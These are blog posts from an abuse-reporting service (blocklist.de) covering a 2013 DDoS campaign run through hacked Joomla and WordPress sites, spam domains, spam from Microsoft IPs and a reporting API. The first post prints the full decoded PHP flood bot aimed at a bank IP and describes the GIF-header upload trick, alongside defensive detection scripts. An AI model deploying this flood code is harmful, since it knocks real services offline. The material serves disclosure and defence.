2013
01.26

We saw the first DDoS against ns1.google.com and Bank of America on 19.09.2012:

https://blog.blocklist.de/2012/09/15/ddos-angriff-auf-ns1-google-com-uber-gehackte-webseiten/

The attacker abused old installations of the "bluestork" template and old WordPress sites.

He uploaded the complete script and called it via GET parameters to start it.

Then he changed the approach: he uploads only an HTML upload form through old Joomla installations < 2.5.7 (in most cases the JCE editor was exploited) and uses the GIF trick in PHP: the upload script has a GIF header and some binary data in its first lines.

The "file" program on Linux reports it as a GIF image, but after the header comes normal PHP code.
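A small checker for exactly this trick, added here as an example (it is not code from the post): a file that starts with a GIF signature, so `file` calls it an image, but carries a PHP open tag further on is flagged as a polyglot. The directory scan and the two sample files are constructed for the demonstration.

```python
import os
import re
import tempfile

GIF_MAGIC = (b"GIF87a", b"GIF89a")
# PHP open tags: "<?php" (any case) or the short echo tag "<?="
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)

def is_gif_php_polyglot(data: bytes) -> bool:
    """True if the bytes carry a GIF signature but also contain a PHP open tag."""
    if not data.startswith(GIF_MAGIC):
        return False
    return PHP_TAG.search(data) is not None

def scan_upload_dir(root: str) -> list:
    """Walk an upload directory (e.g. a Joomla images/ folder) and return suspicious paths."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(1024 * 1024)  # the first MiB is enough for this check
            except OSError:
                continue
            if is_gif_php_polyglot(head):
                hits.append(path)
    return sorted(hits)

# Constructed samples: a GIF header followed by PHP, and a plain (truncated) GIF.
POLYGLOT = b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00<?php echo 'not an image'; ?>"
PLAIN_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00;"

def demo() -> list:
    """Write both samples into a temporary directory, scan it and return the hit names."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, data in (("upload.php", POLYGLOT), ("logo.gif", PLAIN_GIF)):
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(data)
        return [os.path.basename(p) for p in scan_upload_dir(tmp)]

if __name__ == "__main__":
    print(demo())
```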

Through the upload script he uploads another small script and sends the payload via POST; the script runs it through base64_decode(). The complete payload from one of the POST requests, in $_REQUEST['mjdu'], was an eval(base64_decode("...")) call wrapping a long base64 string.



Decoded, it was:


    $iii='171.161.199.100';   // target IP
    $ppp='443';               // target port
    $ddd='3600';              // default run time in seconds
    $sstt='30';               // lifetime of one instance in seconds
    $rrtt='5';                // delay before the instance re-spawns itself
    $ppss='3';                // length of the junk payload sent per connection

    // Kill switch: a file stext.txt next to the script is meant to stop the bot.
    if(file_exists("stext.txt"))
    {
        $ffp=fopen("stext.txt","r");
        $rr=fread($ffp,8);   // reads at most 8 bytes ...
        fclose($ffp);
        // ... so this comparison with a 10-character string can never be true (dead code)
        if($rr=="NoTtExTrUn")
        {
            $ffp2=fopen("stext.txt","w+");
            fclose($ffp2);
            unlink("stext.txt");
            exit();
            die();
        }
        unlink("stext.txt");
    }
    $step_time=time()+$sstt;       // when this instance exits
    $release_time=time()+$rrtt;    // when it spawns its successor

    // The end time is taken from the request, so the controller decides how long the flood runs.
    if(isset($_REQUEST['time_e']))
    {
        $max_time = $_REQUEST['time_e'];
    }
    else
    {
        $time = time();
        $max_time = $time+$ddd;
    }
    $out=str_repeat(".", $ppss);
    $first1=0;
    while(time() < $max_time)
    {
        // Self-propagation: after $rrtt seconds, POST the same parameters back to this
        // script's own URL, so a fresh instance takes over before this one exits.
        if(time() > $release_time && $first1==0)
        {
            $first1=1;
            $address_host="http://".$_SERVER['HTTP_HOST']."/".$_SERVER['PHP_SELF'];
            $data1['mjdu']=$_REQUEST['mjdu'];
            $data1['psbt']=$_REQUEST['psbt'];
            $data1['time_e']=$max_time;
            $ch1 =@curl_init();
            curl_setopt($ch1,CURLOPT_URL,$address_host);
            curl_setopt($ch1,CURLOPT_SSL_VERIFYPEER,FALSE);
            curl_setopt($ch1,CURLOPT_SSL_VERIFYHOST,2);
            curl_setopt($ch1,CURLOPT_HEADER,1);
            curl_setopt($ch1,CURLOPT_RETURNTRANSFER,0);
            curl_setopt($ch1,CURLOPT_TIMEOUT,10);
            curl_setopt($ch1,CURLOPT_POST, true);
            curl_setopt($ch1,CURLOPT_POSTFIELDS, $data1);
            curl_exec($ch1);
            curl_close($ch1);
        }
        // Each instance only lives $sstt seconds; the chained successor keeps the flood going.
        if(time() > $step_time)
        {
            @exit();
            @die();
        }
        // Flood: open an asynchronous TCP connection to the target and push the junk bytes.
        $socket = @stream_socket_client("tcp://$iii:$ppp",$err,$err2,1,STREAM_CLIENT_ASYNC_CONNECT);
        if ($socket)
        {
            @stream_set_write_buffer($socket, 0);
            @stream_socket_sendto($socket,$out);
        }
        @fclose($socket);
    }
    // Cleanup: recreate and delete the kill-switch file.
    $ffp2=fopen("stext.txt","w+");
    fclose($ffp2);
    unlink("stext.txt");

Why does he use both
@exit();
and
@die();
? One of them is enough 😉 die() is the same as exit() ->
see the die() function on php.net
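Two things in the decoded script are easy to spot in a web server's access log: the parameter names it reads from $_REQUEST (mjdu, psbt, time_e) and the way it re-spawns itself by POSTing to $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'], i.e. from the server's own address. The checker below is an added example, not code from the post; the log lines and the server's own addresses (SELF_IPS) are constructed, and treating self-originated POSTs to .php files as suspicious is an assumption that needs tuning per host.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Common/combined log format; only the fields the checks need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)
# Parameter names the decoded bot script reads from $_REQUEST.
BOT_PARAMS = {"mjdu", "psbt", "time_e"}

def classify(line: str, self_ips: set):
    """Return 'brobot-params', 'self-post' or None for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    if BOT_PARAMS & set(parse_qs(parts.query, keep_blank_values=True)):
        return "brobot-params"
    # The bot re-spawns itself by POSTing to its own URL, so that request
    # arrives from the web server's own address.
    if m.group("method") == "POST" and m.group("ip") in self_ips and parts.path.endswith(".php"):
        return "self-post"
    return None

def scan(lines, self_ips):
    """Return (line number, verdict, client ip) for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        kind = classify(line, self_ips)
        if kind:
            hits.append((n, kind, line.split(" ", 1)[0]))
    return hits

# Constructed sample log (documentation address ranges); 203.0.113.10 is
# assumed to be the web server's own public address.
SELF_IPS = {"203.0.113.10", "127.0.0.1"}
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Jan/2013:09:55:01 +0100] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Jan/2013:09:55:30 +0100] "GET /images/stories/up.php?mjdu=QUFB&psbt=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [25/Jan/2013:09:55:36 +0100] "POST /images/stories/up.php HTTP/1.1" 200 0 "-" "-"',
    '192.0.2.44 - - [25/Jan/2013:09:56:02 +0100] "POST /index.php?option=com_users HTTP/1.1" 303 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG, SELF_IPS):
        print(hit)
```

Legitimate self-requests (cron jobs fetching a local URL with curl) will also show up as self-post, so use that verdict as a prompt to look at the file, not as proof on its own.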

[image: brobot-ddos-01-2013]

After the first script there was better code, in which he uses the curl functions again and again. For code like this one would normally use functions to reduce the duplicated code 🙂

On 22.01.2013 we found over 250 abused Joomla installations.

Today (25.01.2013) he is hacking Joomla installations with a version below 2.5.8 and WordPress sites with older plugins like Akismet version 2.5.5.

It is necessary to update your installations very quickly, or your server will attack US financial institutions 🙂

Think about it: over 250 hacked sites on the servers of just one hoster used for a DDoS gives a lot of power and bandwidth, and we think there are very large numbers of old Joomla installations on servers worldwide 🙂

2013
01.16

Blackhat SEO spam from *.pl domains hosted at OVH on 178.33.177.193

In the last days and weeks we have received a very large list of SEO/spam URLs on .pl domains like these:

http://38291.8gx5zj6a7.pl/

http://20851.y5pcbti2p.pl/

http://10533.m6lkmh37r.pl/

http://35754.igzkbz6j1.pl/

Now the spammer has changed the server. The domains now point to the IP 178.33.177.193, hosted on an OVH system.

For the spam URLs we send an X-ARF report via spamlinks.blocklist.de to the abuse department so they can look at the spam URL. We only send a report when the spam score is high enough, so the false-positive rate is under 5%.

We recommend blocking the IP in all firewalls and gateways.

2013
01.10

In the last days we have seen 13 IPs from the network MICROSOFT-CORP-MSN-AS-BLOCK (Microsoft Corp, ASN8075) in a lot of forum spam, SSH, VoIP and SIP attacks.

We sent the default X-ARF abuse complaint, but only the server making the SSH/SIP attacks was stopped or is no longer reported to us.

So we sent a normal mail to noc@microsoft.com, abuse@microsoft… and abuse@msn…, but received only the acknowledgement mail and a bounce from noc@ saying that the account does not exist, although it is listed in the whois data.

On the servers the RDP port is open:

[image: nmap-ms]

We think these are development systems that were hacked or misconfigured, so that they have a (reverse) proxy which allows fetching URLs from other hosts and not only from the same system.

Some IPs were heavy hitters; for example, the IP 157.56.166.51 sent over 760400 spam comments/posts or automated registrations to honeypot systems. Most of the IPs were stopped or were no longer reported to us after yesterday, but one IP is still alive.

So far we are waiting for an answer from Microsoft 😐

[UPDATE 22.07.2013 11:00:00]
We received an answer from Microsoft:


Hello,

Thank you for bringing this to our attention, please file a response to
http://cert.microsoft.com. Then our security teams will start that
investigation, also you can use that in the future to report suspicious
Microsoft IPs.

Thank you,

Rechie
Online Safety Team

We tried to send a report, but only got the following error message:
An internal error has occured, please try again. Object reference not set to an instance of an object.
With a fake Referer, the form works.
But dear Microsoft, please use an X-ARF parser and generate a new report in your own format from it, rather than your form.

2013
01.02

Reporting attackers to blocklist via HTTP (GET/POST) (without Fail2Ban/DenyHost/mails)

We have just put the BETA of the HTTP API online:

http://www.blocklist.de/de/httpreports.html

With it you can report the data to BlockList.de with e.g. curl/lynx/wget and do not need to install a mail system on the server.

The call requires the following data:

  • Server e-mail address or ID
  • Server API key
  • Attacker IP
  • attacked service (ssh, imap, ftp….)
  • Logfiles
  • format (xml, json, text, php)

Then the data can be sent via POST/GET:

curl -s "http://www.blocklist.de/de/httpreports.html?server=$email@server.tld&apikey=$apikey&ip=$angreiferIP&service=$dienst&logs=urlencode($logs)&format=php"

Depending on the return format, you get the variables status and error:


xml:

<status>success</status>

<error>0</error>

If status contains success, everything went fine.

Otherwise the variable $error is not 0 and, depending on the type of error, the reason is included like this (here: the API key does not match the server):

<server>API-Key stimmt nicht mit dem Server ueberein.</server>

<status>error</status>

Since it has not really been field-tested yet and has so far only been tested by me, there may still be bugs. Please report all bugs or wishes to us. Thanks!
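An added example of using this API from Python (it is not blocklist.de's own client): it builds the report as a POST so the log lines do not end up in URLs and proxy logs, url-encodes the fields, and reads the XML answer as flat <tag>value</tag> pairs, which is all the post shows (no root element is assumed). The two sample answers below are constructed in the shapes shown above; send_report() is the only part that talks to the network.

```python
import re
from urllib.parse import urlencode
from urllib.request import Request, urlopen

API_URL = "http://www.blocklist.de/de/httpreports.html"

def build_report(server, apikey, ip, service, logs, fmt="xml"):
    """Return (url, urlencoded body) for a POST to the HTTP API.

    urlencode() takes care of the logs field, which the curl example
    writes as logs=urlencode($logs).
    """
    fields = {"server": server, "apikey": apikey, "ip": ip,
              "service": service, "logs": logs, "format": fmt}
    return API_URL, urlencode(fields).encode("utf-8")

def parse_xml_answer(text):
    """Flatten <tag>value</tag> pairs (the shape shown in the post) into a dict."""
    return {tag: val.strip() for tag, val in re.findall(r"<(\w+)>(.*?)</\1>", text, re.S)}

def report_succeeded(answer):
    """status 'success' means everything went fine; otherwise error is not 0."""
    return answer.get("status") == "success" and answer.get("error", "0") == "0"

def error_details(answer):
    """Every tag other than status/error carries the reason, e.g. <server>...</server>."""
    return {k: v for k, v in answer.items() if k not in ("status", "error")}

def send_report(server, apikey, ip, service, logs):
    """Submit the report (network call, not exercised offline) and return the parsed answer."""
    url, body = build_report(server, apikey, ip, service, logs)
    with urlopen(Request(url, data=body), timeout=15) as resp:
        return parse_xml_answer(resp.read().decode("utf-8", "replace"))

# Constructed answers in the two shapes the post shows.
OK_ANSWER = "<status>success</status>\n<error>0</error>"
ERR_ANSWER = "<server>API-Key stimmt nicht mit dem Server ueberein.</server>\n<status>error</status>"

if __name__ == "__main__":
    print(report_succeeded(parse_xml_answer(OK_ANSWER)), error_details(parse_xml_answer(ERR_ANSWER)))
```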
